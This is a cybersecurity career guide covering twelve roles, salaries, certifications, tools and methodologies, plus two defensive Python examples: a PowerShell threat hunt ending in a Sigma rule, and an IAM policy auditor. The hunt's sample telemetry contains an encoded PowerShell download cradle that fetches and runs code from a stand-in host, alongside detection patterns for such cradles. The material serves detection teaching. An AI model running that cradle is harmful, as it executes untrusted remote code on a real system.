Career Guide
Updated 2026 · 15 min read

Build a career in cybersecurity.

Cybersecurity isn't one job — it's a constellation of specialties, each with its own tools, certifications, salary curve, and personality fit. This guide breaks down twelve real careers across offense, defense, governance, and engineering, so you can find the one that matches how you actually like to work.

Inside this guide
  • 12 detailed career profiles
  • Salary ranges by experience tier
  • Certifications that actually matter
  • Tools, methods, and skill maps
Career terminology
Blue Team

The defenders. SOC analysts, incident responders, threat hunters — anyone whose job is to stop, detect, or contain attacks.

Red Team

The authorized attackers. Pentesters and red teamers simulate adversaries to find weaknesses before real attackers do.

Purple Team

The bridge. Combines offensive and defensive expertise to improve detection by attacking and tuning together.

01 / The Market

Why this field, why now.

By the numbers

A persistent global talent shortage, entry-level salaries that climb into six figures within a few years in many markets, and one of the lowest unemployment rates of any technical profession. The runway is real.

4.8M: Global cybersecurity workforce gap (ISC2 Cybersecurity Workforce Study, 2024)
32%: Projected growth in information security analyst jobs, 2022–2032 (US Bureau of Labor Statistics; the 2024–2034 projection is 29%, still far faster than the average for all occupations)
$120K: Median US information security analyst salary (BLS, 2024)
~0%: Effective unemployment in the field (a widely cited industry estimate; CyberSeek's supply/demand data shows far more openings than qualified candidates)
02 / The Roles

Twelve cybersecurity careers.


Each profile covers what the role does day-to-day, the typical salary range, key certifications, core tools, and current market demand (the "Demand" figure is this guide's own relative rating of how often the role appears in job postings, not a labor statistic).

Blue Team · Entry

SOC Analyst

$65K–$95K USD / year

First line of defense. Triages alerts in a Security Operations Center, investigates suspicious activity, and escalates real incidents. The most common entry point into the field.

Certifications: Security+, CySA+, GCIA
Core Tools: Splunk, Microsoft Sentinel, CrowdStrike, Wireshark
Demand: 95%
Blue Team · Mid

Incident Responder

$95K–$160K USD / year

When a breach is confirmed, IR takes over. Contains active threats, performs forensics, identifies the attack chain, and writes the post-mortem. High-pressure, high-reward.

Certifications: GCIH, GCFA, GCFE
Core Tools: Velociraptor, FTK, Volatility, EnCase
Demand: 88%
Blue Team · Mid

Threat Hunter

$110K–$170K USD / year

Proactively searches for adversaries that have evaded detection. Builds hypotheses from threat intel, queries telemetry, and turns findings into new detection rules.

Certifications: GCTI, GCDA, eCTHP v2
Core Tools: KQL, Elastic Stack (ELK), MITRE ATT&CK, Sigma
Demand: 82%
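A worked example of the hunt loop this card describes: start from a hypothesis grounded in threat intel, query the telemetry, and write the confirmed finding down as a detection rule. This is added example code, not part of the original guide or any vendor's product. The event records, their field names (host, user, parent, image, cmdline), and the sample command lines are all constructed for illustration, and the Sigma rule is returned as a Python dict rather than YAML so the block has no dependencies beyond the standard library.

```python
"""Hypothesis-driven hunt over process-creation telemetry, ending in a Sigma rule.

Added example, not code from the original guide. Hypothesis: an intruder is
running PowerShell with a Base64-encoded command line (MITRE ATT&CK
T1059.001, obfuscated per T1027), most likely spawned from an Office app.
All events are constructed here; the field names (host, user, parent,
image, cmdline) are an assumption, not any specific EDR or Sysmon schema.
"""
import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed telemetry: a plain script, a benign encoded command from a
# service account, an Office-spawned download cradle, and a non-PowerShell event.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"host": "srv01", "user": "svc_deploy", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps("Get-Service -Name Spooler")},
    {"host": "ws02", "user": "bob", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')")},
    {"host": "ws03", "user": "carol", "parent": "outlook.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encoded|encodedcommand)\s+(?P<blob>[A-Za-z0-9+/=]{16,})")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded script when the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("blob"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real PowerShell blob; leave it for manual review


def hunt(events):
    """Score every PowerShell event against the hypothesis; strongest findings first."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        reasons = ["encoded command line"]
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("download cradle in decoded script")
        if ev["parent"].lower() in OFFICE_PARENTS:
            reasons.append(f"spawned by Office process {ev['parent']}")
        findings.append({"host": ev["host"], "user": ev["user"], "decoded": decoded,
                         "score": len(reasons), "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


def to_sigma_rule():
    """The confirmed hunt, written down as a Sigma rule (a dict; dump to YAML to ship it)."""
    return {
        "title": "Encoded PowerShell Command Spawned by Office Application",
        "status": "experimental",
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {
                "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                "ParentImage|endswith": sorted("\\" + p for p in OFFICE_PARENTS),
                "CommandLine|re": r"(?i)\s-(e|ec|enc|encoded|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
            },
            "condition": "selection",
        },
        "level": "high",
        "tags": ["attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027"],
        "falsepositives": ["Signed admin scripts launched through Office add-ins"],
    }


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["score"], f["host"], f["user"], "|", "; ".join(f["reasons"]))
        print("   decoded:", f["decoded"])
```

Run stand-alone, the Word-spawned cradle scores 3 and rises to the top, while the service account's encoded `Get-Service` scores 1 and is the kind of hit you document as a known-good exclusion rather than a rule. The decision to decode rather than simply flag `-enc` is the whole point: the decoded content is what lets you separate the two, and it is what the Sigma rule's `falsepositives` field should be written from.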
Blue Team · Specialized

Malware Analyst

$120K–$190K USD / year

Reverse-engineers malicious code to understand its behavior, capabilities, and origin. Deeply technical (assembly, debugging, sandboxes, unpacking) and produces the indicators and behavioral intelligence that detection engineering and incident response depend on.

Certifications: GREM, eCMAP, OSEE
Core Tools: IDA Pro, Ghidra, x64dbg, Cuckoo (or its maintained fork, CAPEv2)
Demand: 70%
Red Team · Mid

Penetration Tester

$90K–$160K USD / year

Authorized to break in. Conducts scoped engagements against networks, web apps, and infrastructure to find vulnerabilities, and writes reports clients can actually act on.

Certifications: OSCP, PNPT, CRTP
Core Tools: Burp Suite, Metasploit, Nmap, BloodHound
Demand: 90%
Red Team · Senior

Red Team Operator

$140K–$220K USD / year

Long-running adversary emulation. Goes beyond pentesting to mimic specific threat actors, evade detection, and test the blue team's response capabilities end-to-end.

Certifications: OSEP, CRTO, CRTL
Core Tools: Cobalt Strike, Sliver, Mythic, custom C2
Demand: 75%
Red Team · Independent

Bug Bounty Hunter

$0–$500K+ USD / year

Independent researcher who finds vulnerabilities in public programs and earns per-find bounties. Wildly variable income and full schedule autonomy; only top performers earn well.

Specializations: Web, Mobile, API
Core Tools: HackerOne, Bugcrowd, Caido, ffuf
Demand: 65%
Engineering · Mid

Cloud Security Engineer

$130K–$200K USD / year

Secures workloads across AWS, Azure, and GCP. Hardens IAM, builds guardrails in IaC, configures CSPM tools, and works with developers to ship safely. One of the hottest specialties.

Certifications: AWS Certified Security – Specialty, CCSP, GCSA
Core Tools: Terraform, Wiz, Prowler, Kubernetes
Demand: 98%
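A worked example of the "guardrails in IaC" and CSPM-style checking this card mentions. It is added here and is not code from the original guide or from Prowler, Wiz, or any other product: a small auditor that reads an AWS IAM policy document and flags wildcard actions, wildcard resources on write actions, and privilege-escalation-capable actions granted without an MFA condition. Both policies are constructed for the example (the account ID is the AWS documentation placeholder), and the list of escalation actions is a deliberately short assumption rather than the full set a real tool carries.

```python
"""IAM policy guardrail: flag over-broad statements before they are applied.

Added example, not code from the original guide or from any CSPM product.
It performs the checks a CI guardrail or a tool such as Prowler raises on
AWS IAM policy documents: wildcard actions, wildcard resources on write
actions, and privilege-escalation-capable actions granted without an MFA
condition. Both policies below are constructed for this example; the
account ID is the AWS documentation placeholder.
"""
import fnmatch
import json

# Actions that let a principal widen its own access. Assumption: a short
# illustrative subset, not the full list a real tool maintains.
ESCALATION_ACTIONS = {
    "iam:CreatePolicyVersion", "iam:AttachUserPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutRolePolicy", "iam:PassRole", "sts:AssumeRole",
}
READ_ONLY_PREFIXES = ("describe", "list", "get")

# Constructed: the kind of policy that "just works" when written in a hurry.
OVERLY_BROAD = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:*", "iam:PassRole"], "Resource": "*"},
    ],
})

# Constructed: the same workload scoped to what it actually needs.
LEAST_PRIVILEGE = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::app-logs", "arn:aws:s3:::app-logs/*"]},
        {"Effect": "Allow", "Action": "ec2:DescribeInstances", "Resource": "*"},
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Resource": "arn:aws:iam::123456789012:role/deploy",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
    ],
})


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalize to a list."""
    return value if isinstance(value, list) else [value]


def _is_read_only(action):
    """Describe/List/Get calls are the usual legitimate reason for Resource '*'."""
    return action.split(":", 1)[-1].lower().startswith(READ_ONLY_PREFIXES)


def _requires_mfa(statement):
    """True if any condition operator in the statement carries the MFA-present key."""
    return any("aws:MultiFactorAuthPresent" in keys
               for keys in statement.get("Condition", {}).values())


def audit_policy(document):
    """Return (severity, statement_index, message) findings for every Allow statement."""
    findings = []
    for i, stmt in enumerate(_as_list(json.loads(document).get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "*" in actions:
            findings.append(("critical", i, "Action '*' grants every API call"))
        elif any(a.endswith(":*") for a in actions):
            wide = [a for a in actions if a.endswith(":*")]
            findings.append(("high", i, f"service-wide wildcard actions: {wide}"))
        if "*" in resources and not all(_is_read_only(a) for a in actions):
            findings.append(("high", i, "Resource '*' on non-read-only actions"))
        # IAM wildcards apply to action names too, so match as patterns, not strings.
        esc = sorted(e for e in ESCALATION_ACTIONS
                     if any(fnmatch.fnmatchcase(e.lower(), a.lower()) for a in actions))
        if esc and not _requires_mfa(stmt):
            findings.append(("high", i, f"privilege-escalation actions without MFA condition: {esc}"))
    return findings


if __name__ == "__main__":
    for name, doc in (("overly broad", OVERLY_BROAD), ("least privilege", LEAST_PRIVILEGE)):
        print(name + ":", audit_policy(doc) or "clean")
```

The broad policy produces six findings and the scoped one produces none, which is the shape of a useful guardrail: it lets `ec2:DescribeInstances` on `Resource: "*"` through because that API has no resource-level permissions, and it lets `sts:AssumeRole` through only because the statement carries an MFA condition. Wiring this into a pull-request check on Terraform plan output is the "guardrails in IaC" half of the job; the same logic run against live account policies is the CSPM half.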
Engineering · Senior

Security Architect

$150K–$230K USD / year

Designs how security gets built into systems from the start. Threat models new products, defines reference architectures, and sets the standards engineering teams build against.

Certifications: CISSP-ISSAP, SABSA, TOGAF
Core Methods: STRIDE, Zero Trust, SASE, PASTA
Demand: 80%
Engineering · Mid

Application Security Engineer

$120K–$190K USD / year

Embedded with development teams to ship secure code. Reviews PRs, runs SAST/DAST/SCA, threat models features, and trains developers. The bridge between dev and security.

Certifications: CSSLP, GWAPT, OSWE
Core Tools: Semgrep, Snyk, Checkmarx, OWASP ZAP
Demand: 92%
Governance · Entry to Senior

GRC Analyst

$80K–$160K USD / year

Governance, Risk, Compliance. Maps controls to frameworks, runs audits, manages vendor risk, and writes the policies that keep regulators satisfied. Less technical, more strategic.

Certifications: CISA, CRISC, ISO 27001 Lead Auditor
Frameworks: NIST CSF, SOC 2, PCI DSS, HIPAA
Demand: 85%
Leadership · Executive

CISO / Security Director

$200K–$500K+ USD / year

Owns security strategy at the executive level. Reports to the CEO, CIO, or board, manages budget and headcount, and balances risk against business outcomes. Less hacking, more leading.

Certifications: CISSP, CISM (an MBA is common at this level, but it is a degree, not a certification)
Core Skills: Risk Management, Board Reporting, Budgeting, Hiring
Demand: 78%
03 / Compensation

Salary by role, US median.

2025 Data

Median base compensation for senior-level positions in the United States. International markets vary — UK and EU typically run 30–40% lower, while top-tier tech hubs (Bay Area, NYC) often run 20–30% higher.

SOC Analyst: $80K median
GRC Analyst: $120K median
Penetration Tester: $125K median
Incident Responder: $130K median
Threat Hunter: $140K median
AppSec Engineer: $155K median
Malware Analyst: $160K median
Cloud Security Engineer: $165K median
Red Team Operator: $180K median
Security Architect: $190K median
CISO: $310K median
04 / The Credentials

Certifications worth your time.

By tier

Certifications won't get you hired alone, but the right ones open doors and prove baseline competence. Here are the credentials that consistently appear in job postings across all tiers.

Tier 01 / Foundation

Entry-level certs

Start here · 0–2 years
CompTIA Security+ · ~$400 · 3-year renewal
The default starting point. Covers fundamentals and is required for many US government and contractor roles because it sits on the DoD 8570/8140 baseline. Vendor-neutral and widely recognized.
ISC2 CC · exam fee waived under ISC2's "One Million Certified in Cybersecurity" program (check current terms) · 3-year renewal
Certified in Cybersecurity. The newest entry-level cert. The waived exam fee makes it the cheapest credential to put on a resume, and it is a reasonable signal that you can finish what you start.
CompTIA Network+ · ~$370 · 3-year renewal
Networking is the foundation of all security work. If you're weak on subnets, routing, and protocols, take this first.
Tier 02 / Specialist

Mid-level certs

Specialize · 2–5 years
OSCP · ~$1,600+ (bundled with the PEN-200 course) · lifetime for OSCP; the OSCP+ designation issued since late 2024 expires after 3 years
Offensive Security Certified Professional. The gold standard for pentesters: a 24-hour hands-on exam against live machines, not multiple choice.
CySA+ / GCIH · ~$400 / ~$980 (exam only) · 3-year (CompTIA) / 4-year (GIAC) renewal
Defensive analyst certs. CySA+ is more accessible; GCIH (SANS/GIAC) is deeper and more respected, but the paired SANS course adds several thousand dollars on top of the exam fee.
AWS / Azure Security · ~$300 (AWS) / ~$165 (Microsoft) · 3-year renewal for AWS; Microsoft role-based certs renew yearly through a free online assessment
Cloud security is exploding. AWS Certified Security – Specialty and Microsoft SC-100 (Cybersecurity Architect Expert) are the two most-requested cloud security credentials; AZ-500 (Azure Security Engineer) is the hands-on Azure exam one step below SC-100.
Tier 03 / Senior

Advanced certs

Lead · 5+ years
CISSP · ~$750 · 3-year renewal
The management-track default. Required by many senior and director-level postings. Requires five years of paid experience across two or more of the eight CISSP domains (one year is waived with a relevant degree or approved credential); pass the exam without the experience and you hold Associate of ISC2 status until you earn it.
OSEP / OSEE · ~$1,800 (OSEP, bundled with PEN-300) · lifetime
Advanced offensive certs from OffSec. OSEP covers evasion and advanced Active Directory attacks. OSEE, earned through the in-person EXP-401 (Advanced Windows Exploitation) course, is among the hardest exams in the industry and costs considerably more than the figure above; it is a clear differentiator.
CISM / CRISC · ~$760 (non-member; ~$575 for ISACA members) · 3-year renewal
For governance and risk leadership. ISACA's flagship credentials, frequently required for audit, compliance, and CISO roles.
05 / The Toolkit

Tools of the trade.

By category

The tools cybersecurity professionals reach for daily, organized by function. Most are free or have generous community editions — install them, learn them, list them on your resume.

SIEM & Logs
  • Splunk
  • Microsoft Sentinel
  • Elastic Security
  • Wazuh
  • Graylog
Endpoint / EDR
  • CrowdStrike Falcon
  • SentinelOne
  • Microsoft Defender
  • Velociraptor
  • osquery
Offensive
  • Burp Suite
  • Metasploit
  • Cobalt Strike
  • BloodHound
  • Mimikatz
Network Recon
  • Nmap
  • Wireshark
  • Masscan
  • Zeek
  • Suricata
Forensics & DFIR
  • Autopsy
  • Volatility
  • FTK Imager
  • KAPE
  • Plaso
Reverse Engineering
  • Ghidra
  • IDA Pro
  • Binary Ninja
  • x64dbg
  • Radare2
Cloud Security
  • Wiz
  • Prowler
  • ScoutSuite
  • CloudSploit
  • Pacu
AppSec
  • Semgrep
  • Snyk
  • OWASP ZAP
  • Trivy
  • Checkmarx
06 / The Playbook

How professionals actually work.

Methodologies

Five methodologies you'll encounter across virtually every cybersecurity role. Knowing them by name — and what they're for — makes you immediately legible to hiring managers.

01
PTES — Penetration Testing Execution Standard
Seven-phase methodology used by pentesters: pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. The de facto standard for structuring an engagement.
Pentesting Red Team
02
MITRE ATT&CK — Adversarial Tactics, Techniques & Common Knowledge
A curated knowledge base of adversary techniques observed in real intrusions, organized by tactic (the attacker's goal at each step) into matrices for Enterprise, Mobile, and ICS. Defenders map detection coverage against it, red teams plan emulation from it, and threat intel reports cite its technique IDs (for example T1059.001 for PowerShell). Universal reference, but not exhaustive: a behavior missing from the matrix is not evidence that it is benign.
Detection Red Team Threat Intel
03
NIST CSF — Cybersecurity Framework
Govern, Identify, Protect, Detect, Respond, Recover (CSF 2.0, released in 2024, added Govern to the original five functions). The most widely adopted risk-based framework in the world. GRC, architects, and CISOs all speak this language.
GRC Architecture Strategy
04
STRIDE — Threat Modeling
Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege. Microsoft's classic framework for finding threats during design — still the go-to.
Architecture AppSec
05
NIST SP 800-61 — Computer Security Incident Handling Guide
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-Incident Activity. The standard IR lifecycle every responder works against. Revision 3 (2025) reframes incident handling around the CSF 2.0 functions, but the four-phase lifecycle from Revision 2 is still how most teams describe their process.
IR SOC Forensics
07 / Skill Map

Technical vs. soft skills.

By weight

A breakdown of the skills that matter across most cybersecurity roles, weighted by how much hiring managers actually care about them.

Technical Skills
Networking & Protocols 95%
Linux Administration 90%
Scripting (Python / Bash) 85%
Cloud Platforms 85%
Active Directory 80%
Reverse Engineering 50%
Soft Skills
Written Communication 95%
Analytical Thinking 95%
Curiosity & Self-Learning 95%
Calm Under Pressure 85%
Cross-Team Collaboration 80%
Business Acumen 70%
08 / The Path In

Five steps to your first role.

Start to offer

No degree required, and no prior security experience required, though an IT or helpdesk background shortens the path. Follow these five steps in order; budget 6 to 18 months alongside other commitments.

Step 01
Build foundations
Learn networking, Linux, and basic scripting. Free resources: Professor Messer, OverTheWire Bandit, Linux Journey.
Step 02
Pick a track
Defense, offense, governance, engineering. Try TryHackMe paths to feel which clicks before committing time and money.
Step 03
Get one cert
Security+ for most paths. eJPT or PNPT for offense. CC if budget is tight. The point is the discipline of finishing.
Step 04
Build a portfolio
Lab writeups on a personal blog. CTF participation. A home lab. Visible proof of work beats any line on a resume.
Step 05
Apply broadly
Junior SOC roles, helpdesk-to-security, internships, MSSPs. First job is hardest — second one comes much faster.
